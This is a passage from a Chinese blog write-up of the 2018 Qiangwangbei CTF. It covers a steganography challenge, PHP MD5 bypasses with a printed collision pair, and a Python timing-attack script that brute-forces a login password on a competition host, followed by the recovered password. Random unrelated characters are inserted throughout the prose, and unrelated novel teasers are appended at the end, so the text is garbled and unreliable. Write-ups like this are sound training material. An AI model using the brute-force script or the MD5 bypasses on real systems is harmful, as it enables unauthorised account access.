【打醬油】2018強(qiáng)網(wǎng)杯個(gè)人小結(jié)

2018強(qiáng)網(wǎng)杯已經(jīng)過去很久了
剛好再整理一下通過這次比賽的一些個(gè)人收獲
最后感慨侣颂,自己實(shí)在太渣枪孩,要保持勤奮不斷前進(jìn)

image.png

0x01 welcome

一道簡單的misc,給出了一張圖片拒担,直接拖到Stegsolve處理

image.png

在offset為80和100的時(shí)候可以看到flag


image.png
image.png

0x02 Web簽到

這題考察PHP的MD5繞過嘹屯,總共有三關(guān)

其中第一關(guān)是0e弱類型比較

第二關(guān)是數(shù)組繞過MD5比較

第三關(guān)無法繞過,只能找到真正的MD5碰撞

關(guān)于MD5碰撞从撼,已經(jīng)有現(xiàn)成的成果可以使用州弟,曾經(jīng)王曉云教授提出過成果

這里使用的碰撞對(duì)是

0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef

0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef

還可以使用碰撞對(duì)

image.png

在hackbar中通過自帶的hex轉(zhuǎn)char功能進(jìn)行轉(zhuǎn)換,最后post通過

image.png
image.png

0x03 3pigs

image.png

這題一直沒有被人拿下低零,是web+pwn的題目

充滿好奇去嘗試了下婆翔,雖然沒有結(jié)果,但是過程還是記錄一下

訪問題目鏈接后是一個(gè)登錄界面啃奴,嘗試sql注入等,并沒有漏洞點(diǎn)

查看源代碼發(fā)現(xiàn)注釋中提示timing attack雄妥,既時(shí)序攻擊纺腊,于是寫代碼進(jìn)行爆破

時(shí)序攻擊的介紹可以參考

https://www.zhihu.com/question/20156213

大致就是服務(wù)端對(duì)錯(cuò)誤密碼處理的響應(yīng)時(shí)間有細(xì)微差異,假如逐位進(jìn)行密碼驗(yàn)證茎芭,則連續(xù)位數(shù)正確越多的密碼揖膜,服務(wù)器返回時(shí)間越長

這里給出手動(dòng)爆破的python腳本

#coding:utf-8

import requests

url="http://39.107.33.62:31927/login.php"

post={

"team":"icq15f6add5d952d9d8efac6c045970a",

"username":"admin",

"password":""

}

maxtime=0

char=""

for i in range(34,127):

avgtime=0

c = chr(i)

#這里進(jìn)行諸位手動(dòng)爆破

post["password"]="I10ve3P|g"+c+"*"*0

# I10ve3P|g~

response = requests.post(url, data=post)

avgtime = response.elapsed.microseconds

if avgtime > maxtime:

maxtime=avgtime

char = c

print(post["password"]+":"+str(avgtime)+" "+response.text)

if "Failed" not in response.text:

print("success!!")

f=open("success.txt","a")

f.write(post["password"])

f.close()

print(char)

最后得到登錄密碼是

I10ve3P|g~

登錄后進(jìn)入新的頁面


image.png
image.png

和這幾只豬死磕了很久都沒有思路,最后GG

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末梅桩,一起剝皮案震驚了整個(gè)濱河市壹粟,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌宿百,老刑警劉巖趁仙,帶你破解...
    沈念sama閱讀 217,509評(píng)論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異垦页,居然都是意外死亡雀费,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,806評(píng)論 3 394
  • 文/潘曉璐 我一進(jìn)店門痊焊,熙熙樓的掌柜王于貴愁眉苦臉地迎上來盏袄,“玉大人,你說我怎么就攤上這事薄啥≡穑” “怎么了?”我有些...
    開封第一講書人閱讀 163,875評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵垄惧,是天一觀的道長刁愿。 經(jīng)常有香客問我,道長到逊,這世上最難降的妖魔是什么铣口? 我笑而不...
    開封第一講書人閱讀 58,441評(píng)論 1 293
  • 正文 為了忘掉前任滤钱,我火速辦了婚禮,結(jié)果婚禮上脑题,老公的妹妹穿的比我還像新娘菩暗。我一直安慰自己,他們只是感情好旭蠕,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,488評(píng)論 6 392
  • 文/花漫 我一把揭開白布停团。 她就那樣靜靜地躺著,像睡著了一般掏熬。 火紅的嫁衣襯著肌膚如雪佑稠。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,365評(píng)論 1 302
  • 那天旗芬,我揣著相機(jī)與錄音舌胶,去河邊找鬼。 笑死疮丛,一個(gè)胖子當(dāng)著我的面吹牛幔嫂,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播誊薄,決...
    沈念sama閱讀 40,190評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼履恩,長吁一口氣:“原來是場噩夢(mèng)啊……” “哼!你這毒婦竟也來了呢蔫?” 一聲冷哼從身側(cè)響起切心,我...
    開封第一講書人閱讀 39,062評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎片吊,沒想到半個(gè)月后绽昏,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,500評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡俏脊,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,706評(píng)論 3 335
  • 正文 我和宋清朗相戀三年全谤,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片爷贫。...
    茶點(diǎn)故事閱讀 39,834評(píng)論 1 347
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡认然,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出沸久,到底是詐尸還是另有隱情季眷,我是刑警寧澤,帶...
    沈念sama閱讀 35,559評(píng)論 5 345
  • 正文 年R本政府宣布卷胯,位于F島的核電站,受9級(jí)特大地震影響威酒,放射性物質(zhì)發(fā)生泄漏窑睁。R本人自食惡果不足惜挺峡,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,167評(píng)論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望担钮。 院中可真熱鬧橱赠,春花似錦、人聲如沸箫津。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,779評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽苏遥。三九已至饼拍,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間田炭,已是汗流浹背师抄。 一陣腳步聲響...
    開封第一講書人閱讀 32,912評(píng)論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留教硫,地道東北人叨吮。 一個(gè)月前我還...
    沈念sama閱讀 47,958評(píng)論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像瞬矩,于是被迫代替她去往敵國和親茶鉴。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,779評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容

  • 我使用的是火狐瀏覽器 使用火狐瀏覽器的hackbar插件 如果有錯(cuò)誤的地方希望大家多多指出景用,多謝多謝 WEB2 點(diǎn)...
    yangc隨想閱讀 54,273評(píng)論 11 16
  • 本文是Medusa和Hydra快速入門手冊(cè)的第二部分蛤铜,第一部分的傳送門這兩篇也是后續(xù)爆破篇的一部分,至于字典丛肢,放在...
    LinuxSelf閱讀 2,853評(píng)論 0 4
  • 繞過Cisco TACACS+的三種攻擊方式 一般來說围肥,在一個(gè)大型網(wǎng)絡(luò)中會(huì)有很多網(wǎng)絡(luò)設(shè)備,如何管理這些網(wǎng)絡(luò)設(shè)備的訪...
    查無此人asdasd閱讀 922評(píng)論 0 1
  • 我們都太聰明 聰明到不會(huì)付出真心 聰明到忘記善良和孝順 在浮華里丟掉自己的誠懇 好獲得城市璀璨的霓虹 在匆忙里丟掉...
    葉落歲暮閱讀 268評(píng)論 13 5
  • 秋蟬用一生去鳴啼 欲留下短暫的光輝 飛蛾用生命去證明 欲看到瞬息的絢麗 而曾迷于腐醉的 迷于循環(huán)往復(fù)的車輪的 似昨...
    長安之上閱讀 169評(píng)論 0 1